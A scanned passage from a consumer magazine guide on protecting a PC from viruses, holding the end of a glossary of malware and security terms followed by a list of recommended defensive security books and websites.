by  garbling  its  own  code.  When  these  viruses  spread,  they 
change  the  way  their  code  is  encoded  so  anti-virus  software  can- 
not find  them.  A small  portion  of  the  virus  code  decodes  the  gar- 
bled code  when  activated.  See  Also:  Self-encrypting  Virus, 
Polymorphic  Virus. 

Signature 

A search  pattern,  often  a simple  string  of  characters  or  bytes, 
expected  to  be  found  in  every  instance  of  a particular  virus. 
Usually,  different  viruses  have  different  signatures.  Anti-virus  scan- 
ners use  signatures  to  locate  specific  viruses.  Also:  Virus  Signatures 

Slow  Mailer 

A slow  mailer  is  a virus  that  distributes  itself  from  victim 
machines  via  e-mail  but  not  in  the  ‘explosive’  manner  attributed 
to  mass  mailers. 
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Slow  Polymorphism 

A term  occasionally  applied  to  polymorphic  viruses  that  only  morph 
their  code  ‘occasionally’  rather  than  each  time  they  replicate,  as  is 
more  common.  This  is  an  ‘anti-antivirus  research’  technique. 

SMTP 

Simple  Mail  Transport  Protocol.  The  Internet  e-mail  delivery  for- 
mat for  transmitting  e-mail  messages  between  servers. 

Sniffer 

A wiretap  that  eavesdrops  on  computer  networks.  The  attacker 
must  be  between  the  sender  and  the  receiver  in  order  to  sniff  traf- 
fic. This  is  easy  in  corporations  using  shared  media.  Sniffers  are 
frequently  used  as  part  of  automated  programs  to  sift  information 
off  the  wire,  such  as  clear-text  passwords,  and  sometimes  pass- 
word hashes  (to  be  cracked). 

Social  Engineering 

There  are  two  main  ways  to  obtain  technical  or  administrative 
information  about  a computer  system.  The  first  is  from  the  sys- 
tems themselves  and  the  second  is  from  the  administrators  and 
users  of  the  machines.  Surreptitious  or  unauthorised  attempts  to 
obtain  such  system  information  are  known  as  hacking  or  cracking 
if  the  attempt  involves  obtaining  information  from  the  machines, 
and  is  called  social  engineering  if  the  attempts  involve  manipu- 
lating or  ‘tricking’  a person  into  divulging  the  information. 

SOCKS  Proxy 

Socks  (or  SOCKS)  is  an  IETF  standard  protocol  for  TCP/IP-based 
networking  applications.  A proxy  server  (a  server  that  sits 
between  a client  application  and  a real  server)  can  use  SOCKS  to 
accept  requests  from  clients  so  that  they  can  be  forwarded  across 
the  Internet.  Socks  uses  sockets  to  represent  and  keep  track  of 
individual  connections. 

SPAM  Tool 

Any  software  designed  to  extract  e-mail  addresses  from  Web  sites 
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and  other  sources,  remove  ‘dangerous’  or  ‘illegal’  addresses, 
and/or  efficiently  send  unsolicited  (and  perhaps  untraceable)  mail 
to  these  addresses. 

Sparse  Infector 

Just  like  slow  infection  methods,  sparse  infection  is  also  an 
approach  to  reduce  the  chances  of  early  detection.  The  main  idea 
is  to  replicate  only  occasionally;  for  example,  only  infecting  one  in 
every  100  programs  that  are  executed. 

Spyware 

A program  that  gathers  information  and  can  be  ‘silently’  installed 
and  run  in  ‘stealth’  mode.  This  kind  of  software  is  used  to  gather 
information  from  a user’s  machine,  such  as  recorded  keystrokes 
(passwords),  a list  of  Web  sites  visited  by  the  user,  applications 
installed  on  the  machine,  the  version  of  operating  system,  registry 
settings  and  so  on. 


Spyware  Cookie 

Any  cookie  that  is  shared  among  two  or  more  unrelated  sites  for 
the  purpose  of  gathering  and  sharing  private  user  information. 

Stealth  Virus 

Stealth  viruses  attempt  to  conceal  their  presence  from  anti- 
virus software.  Many  stealth  viruses  intercept  disk-access 
requests,  so  when  an  anti-virus  application  tries  to  read  files  or 
boot  sectors  to  find  the  virus,  the  virus  feeds  the  program  a 
‘clean’  image  of  the  requested  item.  Other  viruses  hide  the 
actual  size  of  an  infected  file  and  display  the  size  of  the  file 
before  infection. 

Surveillance 

Any  software  designed  to  use  a Web  cam,  microphone,  screen  cap- 
ture, or  other  approaches  to  monitor  and  capture  information. 
Some  such  software  will  transmit  this  captured  information  to  a 
remote  source. 
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SYN  Flood  Attack 

In  the  normal  course  of  a TCP  connection,  a SYN  (TCP  connection 
request)  is  sent  to  a target  computer.  When  the  target  computer 
receives  the  SYN,  it  sends  a SYN_RECEIVED  message  back  to  the 
machine  that  sent  the  SYN  (reading  the  IP  source  address  of  the 
originating  packet).  The  target  computer  then  waits  for  the 
machine  that  originated  the  request  to  send  back  a SYN_ACK  upon 
receipt  of  its  SYN_RECEIVED  message  (this  SYN-RECEIVED  state  is 
saved  in  a buffer  either  until  the  ACK  is  received  or  until  the 
request  has  been  waiting  for  a particular  finite  period  of  time  and 
is  then  purged).  When  this  three-way  handshake  is  completed, 
data  can  travel  freely  between  the  two  computers. 

Telnet  Server 

Software  that  allows  a remote  user  of  a Telnet  client  to  connect  as 
a remote  terminal  from  anywhere  on  the  Internet  and  control  a 
computer  in  which  the  server  software  is  running. 

Time  Bomb 

A logic  bomb  with  its  trigger  condition(s)  based  on  absolute  or 
elapsed  date  or  time  conditions. 

TOM 

Top  of  Memory.  A design  limit  at  the  640  KB-marlc  on  most  PCs. 
Often  the  boot  record  does  not  completely  reach  top  of  memory, 
thus  leaving  empty  space.  Boot  sector  infectors  often  try  to  conceal 
themselves  by  hiding  around  the  top  of  memory.  Checking  the  top 
of  memory  value  for  changes  can  help  detect  a virus,  though  there 
is  also  non-viral  reasons  this  value  change. 

Tracking  Cookie 

Any  cookie  that  is  shared  among  two  or  more  Web  pages  for  the 
purpose  of  tracking  a user’s  surfing  history. 

Trigger 

The  condition  that  determines  the  launching  of  a virus’  or 
Trojan’s  payload  is  usually  called  the  trigger  or  trigger  condi- 
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tion.  Trigger  is  also  used  as  a verb  to  indicate  the  activation 
of  a payload. 

Trojan,  Trojan  Horse 

A Trojan  horse  program  is  a malicious  program  that  pretends  to  be 
a benign  application;  a Trojan  horse  program  does  something  the 
user  does  not  expect.  Trojans  are  not  viruses  since  they  do  not 
replicate,  but  they  can  be  just  as  destructive. 

Trojan  Creation  Tool 

A program  designed  to  create  Trojans.  Some  of  these  tools  mere- 
ly wrap  existing  Trojans,  to  make  them  harder  to  detect.  Others 
add  a trojan  to  an  existing  product  (such  as  RegEdit.exe),  mak- 
ing it  a Dropper. 

Trojan  Source 

Source  code  is  written  by  a programmer  in  a high-level  language 
and  readable  by  people  but  not  computers.  Source  code  must  be 
converted  to  object  code  or  machine  language  before  a computer 
can  read  or  execute  the  program.  Trojan  Source  can  be  compiled 
to  create  working  trojans,  or  modified  and  compiled  by  program- 
mers to  make  new  working  trojans. 

Timestamp 

The  time  of  creation  or  last  modification  recorded  on  a file  or 
another  object.  Users  can  usually  find  the  timestamp  in  the 
Properties  section  of  a file. 

TSR 

Terminate  and  Stay  Resident.  TSR  programs  stay  in  memory 
after  being  executed.  TSR  programs  allow  the  user  to  quickly 
switch  back  and  forth  between  programs  in  a non-multitasking 
environment,  such  as  MS-DOS.  Some  viruses  are  TSR  programs 
that  stay  in  memory  to  infect  other  files  and  programs.  Also: 
Memory-resident  Program 

Tunnelling 

A virus  technique  designed  to  prevent  anti-virus  applications 


184 


HSE  FAST  TRACK 


Glossaryl  VII 


VIRUS  PROOF  YOUR  PC 


from  working  correctly.  Anti-virus  programs  work  by  intercept- 
ing the  operating  system  actions  before  it  can  execute  a virus. 
Tunnelling  viruses  try  to  intercept  actions  before  the  anti-virus 
software  can  detect  the  malicious  code.  New  anti-virus  pro- 
grams can  recognise  many  viruses  with  tunnelling  behaviour. 

Usage  Tracks 

Usage  tracks  permit  any  user  (or  their  software  agent)  with 
access  to  your  computer  to  see  what  you’ve  been  doing.  Such 
tracks  benefit  you  if  you  have  left  the  tracks,  but  might  benefit 
another  user  as  well. 

Virus 

A computer  program  file  capable  of  attaching  to  disks  or  other 
files  and  replicating  itself  repeatedly,  typically  without  user 
knowledge  or  permission.  Some  viruses  attach  to  files  so  when 
the  infected  file  executes,  the  virus  also  executes.  Other  viruses 
sit  in  a computer’s  memory  and  infect  files  as  the  computer 
opens,  modifies  or  creates  the  files.  Some  viruses  display  symp- 
toms, and  some  viruses  damage  files  and  computer  systems,  but 
neither  symptoms  nor  damage  is  essential  in  the  definition  of  a 
virus;  a non-damaging  virus  is  still  a virus. 

Virus  Creation  Tool 

A program  designed  to  generate  viruses.  Even  early  virus  cre- 
ation tools  were  able  to  generate  hundreds  or  thousands  of  dif- 
ferent, functioning  viruses,  which  were  initially  undetectable  by 
current  scanners. 

Web  Bug 

A Web  Bug  is  a device  used  in  HTML  Web  pages  and  e-mail  that  is 
used  to  monitor  who  is  reading  the  Web  page  or  e-mail.  These  are 
small,  hidden,  difficult  to  detect  eavesdropping  devices.  Most  of  the 
time,  you  will  not  even  be  aware  that  these  bugs  exist,  as  they  hide 
within  1 by  1 pixel  html  image  tags,  although  any  graphic  on  a Web 
page  or  in  an  e-mail  can  be  configured  to  act  as  a Web  bug.  This  is 
not  to  say  that  all  invisible  gifs  on  Web  pages  are  Web  bugs;  some 
invisible  gif  files  are  used  for  alignment  and  design  purposes. 
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WildList 

Although  there  are  many  thousands  of  known  viruses,  few  actual- 
ly cause  any  real-world  concern,  and  those  that  do  are  often  said 
to  be  ‘in  the  wild’.  However,  the  term  ‘in  the  wild’  has  been  used 
in  many  different  contexts  and  with  many  different  shades  of 
meaning.  In  an  attempt  to  clear  this  situation  up,  for  computer 
viruses,  antivirus  researcher  Joe  Wells  instigated  what  he  called 
the  WildList.  Its  purpose  was  to  provide  a listing  of  viruses  that 
could  (or  should)  be  considered  ‘in  the  wild’  by  set  criteria. 

Worm 

Worms  are  parasitic  computer  programs  that  replicate,  but  unlike 
viruses,  do  not  infect  other  computer  program  files.  Worms  can 
create  copies  on  the  same  computer,  or  can  send  the  copies  to 
other  computers  via  a network. 

Worm  Creation  Tool 

A program  designed  to  generate  worms.  Worm  creation  tools  can 
often  generate  hundreds  or  thousands  of  different,  functioning 
worms,  most  of  which  are  initially  undetectable  by  current  scanners. 

Windows  Scripting 

Windows  Scripting  Host  (WSH)  is  a Microsoft  integrated  module 
that  lets  programmers  use  any  scripting  language  to  automate 
operations  throughout  the  Windows  desktop. 

Zoo 

A collection  of  viruses  used  for  testing  by  researchers. 
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Knowledge  is  power.  When  it  comes  to  viruses  and  security 
threats,  the  more  you  know,  the  more  prepared  you  can  be. 
We  have  covered  just  about  all  the  important  subjects  related  to 
viruses  that  an  average  computer  user  should  know,  but  you  can 
always  learn  more.  Luckily,  the  information  is  easy  to  find.  We 
have  listed  a selection  of  useful  books  and  Web  sites  that  can 
help  you  learn  just  about  everything  you  need  to  know  about 
defending  yourself  against  various  threats  arising  from 
malicious  software  or  otherwise. 
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Computer  Viruses  For  Dummies 


Author:  Peter  H Gregory 
Publisher:  John  Wiley  & Sons,  Inc 

Just  the  thought  of  your  trusty  PC 
catching  a computer  virus  is  prob- 
ably enough  to  make  you  sick. 

Thanks  to  the  annoying  virus  writ- 
ers who  persist  in  coming  up  with 
new  strains,  there’s  a major  new 
cyberattaclc  nearly  every  day. 

Viruses  just  happen  to  sneak  in 
from  various  sources.  Fortunately, 
there  are  ways  to  inoculate  and 
protect  your  computer. 

Computer  Viruses  For  Dummies 
helps  you  understand  the  risks  and 
analyse  your  PC’s  current  condi- 
tion. It  also  helps  in  selecting, 
installing,  and  configuring  the 
antivirus  software  along  with  giving  you  information  on  scanning 
your  computer  and  e-mail  and  ridding  your  computer  of  viruses 
that  it’s  already  caught. 

There’s  helpful  information  on  the  use  of  firewalls  and  spy- 
ware  blockers,  protecting  handheld  PDAs  from  viruses  and  adopt- 
ing safe  computing  practices,  especially  with  e-mail  and  when  you 
are  surfing  the  Internet. 
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A Short  Course  on  Computer  Viruses 


Author:  Frederick  Cohen 
Publisher:  John  Wiley  & Sons,  Inc 


Here  is  an  outstanding  opportuni- 
ty to  learn  about  computer  viruses 
from  the  internationally 
acclaimed  pioneer  in  the  field  who 
actually  coined  the  phrase  “com- 
puter virus.”  This  new  edition  of 
Cohen’s  classic  work  has  been 
updated  and  expanded  to  nearly 
double  its  original  size  and  now 
includes  entirely  new  chapters  on 
LAN  viruses,  international  viruses, 
and  good  viruses  (including  code). 

As  entertaining  as  it  is  thorough,  the  text  is  enlivened  by 
Cohen’s  down-to-earth  wit  and  his  many  fascinating  anecdotes 
and  as  yet  unpublished  historical  facts  about  viruses.  Both  broad 
in  its  coverage  and  deep  in  its  consideration,  it  includes  dozens  of 
lucid  explanations  and  examples  that  amicably  guide  the  reader 
through  the  complex,  often  convoluted  subject  matter.  Hailed  as  a 
tour  de  force,  Cohen’s  discussion  of  defensive  strategies  reveals 
many  of  the  stumbling  blocks  that  often  trip  readers  up. 
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Author:  Phil  Schmauder 
Publisher:  Prima  Publishing 

Like  biological  viruses,  computer  virus- 
es can  spread  quickly  and  are  often  dif- 
ficult to  get  rid  of  without  causing  dam- 
age. Virus  Proof:  The  Ultimate  Guide  to 
Protecting  Your  System  provides  key  steps 
you  should  take  to  protect  your  system 
from  these  destructive  viruses.  Inside 
you  will  learn  how  to  recover  data  that 
is  lost  as  a result  of  a virus,  what  com- 
mon viruses  do,  and  how  they  spread. 

Virus  Proof  is  an  excellent  resource  for  any  computer  user,  from 
beginners  to  experts. 


Blocking  Spam  For  Business  For  Dummies 


Authors:  Peter  H Gregory,  Mike  Simon 
Publisher:  John  Wiley  & Sons,  Inc 

Despite  recent  legislation  in  the 
US  and  other  countries,  the  vol- 
ume of  spam  continues  to  grow. 
Spam  now  accounts  for  60  to  75 
per  cent  of  all  e-mail. 

Blocking  Spam  For  Business  For 
Dummies  shows  small  business 
people  and  corporate  information 
security  professionals  how  to  fight 
back  successfully  against  this 
onslaught,  offering  savvy  advice 
on  selecting  and  deploying  a spam 
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filter  as  well  as  training  and  supporting  users.  It  also  provides 
insider  tips  on  troubleshooting  and  fine-tuning  a spam  filter,  as 
well  as  exclusive  guidance  on  how  to  deal  with  ‘Joe  Jobs’  spam 
attacks,  in  which  spammers  hijack  a corporate  domain  name. 


Malware:  Fighting  Malicious  Code 


Authors:  Ed  Skoudis,  Lenny  Zeltser 
Publisher:  Prentice  Hall  PTR 

Ignoring  the  threat  of  mal- 
ware is  one  of  the  most  reck- 
less things  you  can  do  in 
today’s  increasingly  hostile 
computing  environment. 

Malware  is  malicious  code 
planted  on  your  computer, 
and  it  can  give  the  attacker  a 
truly  alarming  degree  of  con- 
trol over  your  system,  net- 
work, and  data-all  without 
your  knowledge!  Written  for 
computer  pros  and  savvy 
home  users  by  computer 
security  expert  Edward 
Skoudis,  Malware:  Fighting 
Malicious  Code  covers  every- 
thing you  need  to  know 
about  malware,  and  how  to  defeat  it! 

This  book  devotes  a full  chapter  to  each  type  of  malware— virus- 
es, worms,  malicious  code  delivered  through  Web  browsers  and  e- 
mail  clients,  backdoors,  Trojan  horses,  user-level  RootKits,  and  ker- 
nel-level manipulation.  You’ll  learn  about  the  characteristics  and 
methods  of  attack,  evolutionary  trends,  and  how  to  defend  against 
each  type  of  attack.  Real-world  examples  of  malware  attacks  help 
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you  translate  thought  into  action,  and  a special  defender’s  toolbox 
chapter  shows  how  to  build  your  own  inexpensive  code  analysis 
lab  to  investigate  new  malware  specimens  on  your  own. 
Throughout,  Skoudis’  clear,  engaging  style  makes  the  material 
approachable  and  enjoyable  to  learn. 

This  book  includes  solutions  and  examples  that  cover  both 
UNIX  and  Windows  operating  systems.  There  are  practical,  time- 
tested,  real-world  actions  you  can  take  to  secure  your  systems  spec- 
ified in  this  book,  along  with  instructions  for  building  your  own 
inexpensive  malware  code  analysis  lab  so  you  can  get  familiar 
with  attack  and  defensive  tools  harmlessly! 


E-mail  Vims  Protection  Handbook:  Protect 
Your  E-mail  From  Viruses,  Trojan  Horses,  And 
Mobile  Code  Attacks 


Authors:  Brian  Bagnall,  James  Stanger 
Publisher:  Syngress  Publishing 

E-mail  has  been  called  the  killer  application  of  the  Internet  with 


so  many  Web-based  com- 
merce applications,  business- 
to-business  transactions,  and 
Application  Service  Providers 
dependent  on  the  e-mail 
client/server  relationship. 
Now,  because  of  that  reliance, 
it  is  possible  for  e-mail  soft- 
ware to  become  killer  appli- 
cations in  an  entirely  differ- 
ent sense— if  they’re  down, 
they  can  kill  your  business.  E- 
mail  Virus  Protections 
Handbook  will  help  systems 
administrators  and  end-users 
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secure  their  e-mail.  It  shows  how  to  encrypt  e-mail  messages,  use 
antivirus  and  personal  firewall  software,  and  secure  the  operating 
system  from  attack.  Know  what’s  lurking  in  your  e-mail! 

Topics  covered  include  malicious  code  that’s  spread  through  e- 
mail  clients,  servers,  and  protocols,  and  how  to  defend  against  it. 
Specifically,  the  book  deals  with  antivirus  software-both  network- 
wide and  for  single  clients-and  configuration  policies  for  Outlook 
2000,  Outlook  Express  5.0,  and  Eudora  4.3  on  the  client  side. 
Server  coverage  includes  Windows  2000  Advanced  Server,  Red  Hat 
Linux  6.0,  Exchange  Server  5.5,  and  Sendmail.  Personal  firewalls, 
such  as  BlackICE  Defender  2.1,  get  attention,  too. 

How  To  Do  Everything  To  Fight  Spam,  Viruses, 
Pop-Ups,  And  Spyware 


Author:  Ken  Feinstein 

Publisher:  McGraw-Hill  Osborne  Media 


Get  expert  advice  on  finally  ridding  your  computer  of  annoying 
spam  and  pop-up  ads  and  invasive  viruses,  spyware,  and  adware. 
You  will  discover  where  these  electronic  nuisances  originate,  how 
they  work,  and  how  to  pre- 
vent them.  Learn  to  choose 
spam-resistant  e-mail  address- 
es and  get  the  most  from  your 
spam  filter.  Protect  your  com- 
puter from  virus  attacks  with 
antivirus  software  and  pre- 
ventive measures.  Also,  find 
out  how  to  avoid  installing 
spyware  and  adware  unknow- 
ingly, and  block  those  pesky 
pop-up  ads.  The  bonus  CD- 
ROM  features  trial  versions  of 
the  prevention  tools  covered 
in  the  book. 
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The  book  helps  you  understand  how  spammers  operate  and 
how  to  safeguard  your  e-mail  addresses  along  with  using  spam-fil- 
tering software  and  challenge-response  mail  systems.  It  shows  you 
how  to  configure  your  PC  to  resist  virus  attacks  and  recognise 
virus-laden  e-mails  and  avoid  virus  infection  when  downloading 
files.  There’s  vital  information  on  installing,  configuring,  and 
updating  antivirus  software,  and  diagnosing  and  removing  virus- 
es from  your  system;  and  also  tips  on  how  to  avoid  installing 
adware  and  spyware  inadvertently. 


Counter  Hack:  A Step-by-Step  Guide  To 
Computer  Attacks  And  Effective  Defenses 


Author:  Ed  Skoudis 
Publisher:  Prentice  Hall  PTR 

This  next-generation  hacker 
book  gives  you  a step-by-step 
guide  to  defending  against 
hacker  intrusions.  Articles  fea- 
ture how  to  defend  against 
today’s  most  powerful  hacker 
attacks;  detect  intrusion  using 
new  evasion  techniques  and 
countermeasures.  It’s  written 
by  Edward  Skoudis,  the  security 
expert  who  demonstrated  hack- 
ing to  the  US  Senate. 


This  easy-to-use,  step-by-step 

guide  will  empower  network  and  system  administrators  to  defend 
their  information  and  computing  assets-whether  or  not  they  have 
security  experience.  In  Counter  Hack,  leading  network  security 
expert  Edward  Skoudis  presents  comprehensive,  insider’s  expla- 
nations of  today’s  most  destructive  hacker  tools  and  tactics-and 
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specific,  proven  countermeasures  for  both  UNIX  and 
Windows  environments. 

Slcoudis  covers  all  this  and  more  in  topics  such  as: 

o Know  your  adversary:  from  script  kiddies  to  elite  attackers, 
o A hacker’s  view  of  networks,  TCP/IP  protocols,  and  their  vulner- 
abilities. 

o Five  phases  of  hacking:  reconnaissance,  scanning,  gaining 
access,  maintaining  access,  and  preventing  detection, 
o The  most  dangerous  and  widespread  attack  scenarios-explained 
in  depth. 

o Key  hacker  tools:  port  scanners,  firewall  scanners,  sniffers,  ses- 
sion hijackers,  RootKits,  and  more, 
o How  hackers  build  elegant  attacks  from  simple  building  blocks 
o Detecting  and  preventing  IP  spoofing,  covert  channels,  denial  of 
service  attacks,  and  other  key  attacks, 
o How  hackers  cover  their  tracks-and  how  you  can  uncover  their 
handiwork. 

o A preview  of  tomorrow’s  hacker  tools,  attacks,  and  counter- 
measures. 

Whatever  your  role  in  protecting  network  infrastructure  and 
data,  Counter  Hack  delivers  proven  solutions  you  can  implement 
right  now-and  long-term  strategies  that  will  improve  security  for 
years  to  come. 

Firewalls  For  Dummies,  Second  Edition 


Authors:  Brian  Komar,  Ronald 

Beelcelaar,  Joern  Wettern 
Publisher:  John  Wiley  & Sons,  Inc 

What  an  amazing  world  we  live  in! 
Almost  anything  you  can  imagine 
can  be  researched,  compared, 
admired,  studied,  and  in  many  cases, 
bought,  with  the  click  of  a mouse. 
The  Internet  has  changed  our  lives, 
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putting  a world  of  opportunity  before  us.  Unfortunately,  it  has  also 
put  a world  of  opportunity  into  the  hands  of  those  whose  motives 
are  less  than  honourable.  A firewall,  a piece  of  software  or  hard- 
ware that  erects  a barrier  between  your  computer  and  those  who 
might  like  to  invade  it,  is  one  solution. 

If  you’ve  been  using  the  Internet  for  any  length  of  time,  you’ve 
probably  received  some  unsavoury  and  unsolicited  e-mail.  If  you 
run  a business,  you  may  be  worried  about  the  security  of  your  data 
and  your  customers’  privacy.  At  home,  you  want  to  protect  your 
personal  information  from  identity  thieves  and  other  shady  char- 
acters. Firewalls  For  Dummies  will  give  you  the  low-down  on  fire- 
walls, then  guide  you  through  choosing,  installing,  and  configur- 
ing one  for  your  personal  or  business  network. 

Firewalls  For  Dummies  helps  you  understand  what  firewalls  are, 
how  they  operate  on  different  types  of  networks,  what  they  can 
and  can’t  do,  and  how  to  pick  a good  one.  You  will  find  out  about 
developing  security  policies,  establishing  rules  for  simple  proto- 
cols, detecting  and  responding  to  system  intrusions,  setting  up 
firewalls  for  SoHo  or  personal  use,  creating  demilitarised  zones, 
using  Windows  or  Linux  as  a firewall,  configuring  ZoneAlarm, 
BlackICE,  and  Norton  personal  firewalls  and  installing  and  using 
ISA  server  and  Fire  Wall-1. 

With  the  handy  tips  and  hints  this  book  provides,  you  will  find 
that  firewalls  are  nothing  to  fear-unless  you’re  a cyber-crook!  You 
will  soon  be  able  to  keep  your  data  safer,  protect  your  family’s  pri- 
vacy, and  probably  sleep  better,  too. 

Absolute  Beginner’s  Guide  To 
Personal  Firewalls 


Authors:  Jerry  Ford,  Stephen  Dodd 
Publisher:  Que 

A consumer-level  firewall  guide  committed  to  teaching  how  to 
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choose  the  right  fire- 
wall software,  set  up  a 
personal  firewall,  and 
test  computer  security. 

Personal  firewall  secu- 
rity is  particularly  use- 
ful for  the  ever-increas- 
ing number  of  users 
with  ‘always  on’ 

Internet  connections 
such  as  those  with  a 
cable  modem  or  DSL 
connection. 

While  previous  fire- 
wall books  have  been 
focused  on  network  pro- 
fessionals and  network 
firewall  protection. 

These  books  have  not  adequately  addressed  the  consumer’s  need 
for  personal  firewall  protection.  This  book  is  designed  to  provide 
simplified,  yet  thorough  firewall  information  on  the  most  preva- 
lent personal  firewall  software  applications  available  for  the  non 
expert  firewall  consumer. 

This  book  will  walk  readers  through  the  basics  such  as  deter- 
mining the  need  for  a firewall  and  testing  current  security.  Other 
chapters  will  demonstrate  and  explain:  how  to  tighten  security, 
choose  a high-speed  Internet  connection,  install  a personal  fire- 
wall, and  test  new  security. 

Firewalls:  The  Complete  Reference 


Authors:  Keith  Strassberg,Gary  Rollie, Richard  Gondelc 
Publisher:  McGraw-Hill  Osborne  Media 

Get  in-depth,  objective  advice  on  installing  and  configuring 
today’s  most  popular  firewalls  including  Check  PointTM  Firewall- 
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1 4.1  and  NG,  Cisco  PIX, 

Microsoft  ISA  Server, 

NetScreen,  SonicWall 
and  Symantec-and  learn 
strategies  for  successful 
network  design  and  fire- 
wall placement.  Gain 
insight  into  common 
methods  for  attacking 
firewalls-including  soft- 
ware bugs,  viruses,  and 
m ^configurations. 

Learn  firewall  best  prac- 
tices and  how  to 
improve  the  overall 
security  of  your  firewall 
installation.  This  multi- 
purpose guide  contains 
all  the  implementation  and  administration  information  you  need 
to  keep  your  network  safe  from  unauthorised  access. 

Learn  to  restrict  access  to  your  network  without  compromising 
usability  and  functionality.  Understand  the  strengths  and  limita- 
tions of  firewall  technology  with  the  in-depth  explanations  of  net- 
work and  port  address  translation,  VPNs,  authentication,  virus 
protection,  content  filtering,  and  more.  Learn  about  the  various 
architectures  available  today-application  and  circuit-level  gate- 
ways, packet  filters,  and  stateful  packet  inspection  engines. 

Find  out  how  hackers  commonly  go  about  breaking  into  a net- 
work. Manage  your  firewall  installation  using  inbuilt  tools, 
objects,  and  services  and  supplement  it  by  implementing  human 
controls  such  as  education  and  log  monitoring. 
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The  Art  of  Computer 
Virus  Research 
And  Defense 


Author:  Peter  Szor 
Publisher:  Addison-Wesley 
Professional 

Symantec’s  chief  antivirus 
researcher  has  written  the 
definitive  guide  to  contem- 
porary virus  threats,  defence 
techniques,  and  analysis 
tools.  Unlike  most  books  on 
computer  viruses,  The  Art  of 
Computer  Virus  Research  and 
Defense  is  a reference  written  strictly  for  white  hats:  IT  and  security 
professionals  responsible  for  protecting  their  organizations  against 
malware.  Peter  Szor  systematically  covers  everything  you  need  to 
know,  including  virus  behavior  and  classification,  protection  strate- 
gies, antivirus  and  worm-blocking  techniques,  and  much  more. 

Szor  presents  the  state-of-the-art  in  both  malware  and  protec- 
tion, providing  the  full  technical  detail  that  professionals  need  to 
handle  increasingly  complex  attacks.  Along  the  way,  he  provides 
extensive  information  on  code  metamorphism  and  other  emerging 
techniques,  so  you  can  anticipate  and  prepare  for  future  threats. 

Szor  also  offers  the  most  thorough  and  practical  primer  on  virus 
analysis  ever  published-addressing  everything  from  creating  your 
own  personal  laboratory  to  automating  the  analysis  process.  This 
book’s  coverage  includes  discovering  how  malicious  code  attacks  on 
a variety  of  platforms,  classifying  malware  strategies  for  infection,  in- 
memory operation,  self-protection,  payload  delivery,  exploitation, 
and  more.  It  also  includes  identifying  and  responding  to  code  obfus- 
cation threats:  encrypted,  polymorphic,  and  metamorphic,  master- 
ing empirical  methods  for  analyzing  malicious  code-and  what  to  do 


EMI  FAST  TRACK 


199 


VIII I Tools/Web  sites 


VIRUS  PROOF  YOUR  PC 


with  what  you  learn,  reverse-engineering  malicious  code  with  disas- 
semblers, debuggers,  emulators,  and  virtual  machines. 

The  book  teaches  you  how  to  implement  technical  defences  such 
as  scanning,  code  emulation,  disinfection,  inoculation,  integrity 
checking,  behaviour  blocking,  using  worm  blocking,  host-based 
intrusion  prevention,  and  network-level  defence  e-strategies. 

Web  sites 

Virus  Bulletin 

www.virusbtn.com 

Virus  Bulletin  started  in  1989  as  a magazine  dedicated  to  providing 
PC  users  with  a regular  source  of  intelligence  about  computer 
viruses,  their  prevention,  detection  and  removal,  and  how  to 
recover  programs  and  data  following  an  attack. 

Editorial  independence  has  always  been  Virus  Bulletin’s  prime 
concern.  From  the  very  first  issue,  Virus  Bulletin  has  cut  through 
antivirus  hype  and  remained  uninfluenced  by  sales  pitches  and 
marketing  babble.  The  aim  of  the  magazine  is  to  arm  users  with 
all  the  information  they  need  to  stay  current  with  the  latest  devel- 
opments in  the  antivirus  field. 
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Symantec  Worldwide  Home  Page 


www.symantec.com 

The  premier  site  for  most  people  who  get  hit  by  a new  worm! 
Symantec  is  not  merely  just  a home  to  one  of  the  world’s  most 


widely  used  antivirus  solution,  but  it’s  considered  a Mecca  for  peo- 
ple who  want  to  follow  up  on  the  latest  developments  in  the 
antivirus  industry. 

Vmyths 

www.vmyths  .com 

The  term  ‘Computer  Virus’  can  be  quite  scary  for  some  people,  and 
for  those  who  don’t  have  the  knowledge  about  it  can  be  led  to 
believe  anything.  That’s  where  Vmyths  comes  in. 


Vmyths  helps  you  learn  about  computer  virus  myths,  hoaxes, 
urban  legends,  hysteria,  and  the  implications  if  you  believe  in 
them.  You  can  also  search  a list  of  computer  virus  hoaxes  and  virus 
hysteria  to  broaden  your  knowledge  about  the  truth  behind  the 
scare.  Vmyths  stays  independent  from  any  antivirus  companies 
and  claims  to  speak  of  the  truth  rather  than  what  the  antivirus 
companies  want  you  to  believe. 

Microsoft  Security 

www.microsoft.com/security 

For  the  latest  information  in  security  fixes,  updates  and  patches 
for  Windows  and  other  Microsoft  products,  this  site  is  the  place  to 
be.  Along  with  security  updates,  Microsoft  security  provides  news 
and  information  on  recent  developments  in  the  field;  and  also 
contain  guides  on  keeping  your  PC  more  secure. 
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Spyware;  Try  our  new  ami -spyware 
solution — download  the  beta  today  -> 
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Gi  Current  Security  Updates 

Get  information  on  the  latest  software  security  updates. 


trustworthy  Computing 
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Recent  Incidents 


Find  out  how  to  help  protect  your  PC  against  viruses,  hackers, 
and  other  security  issues. 
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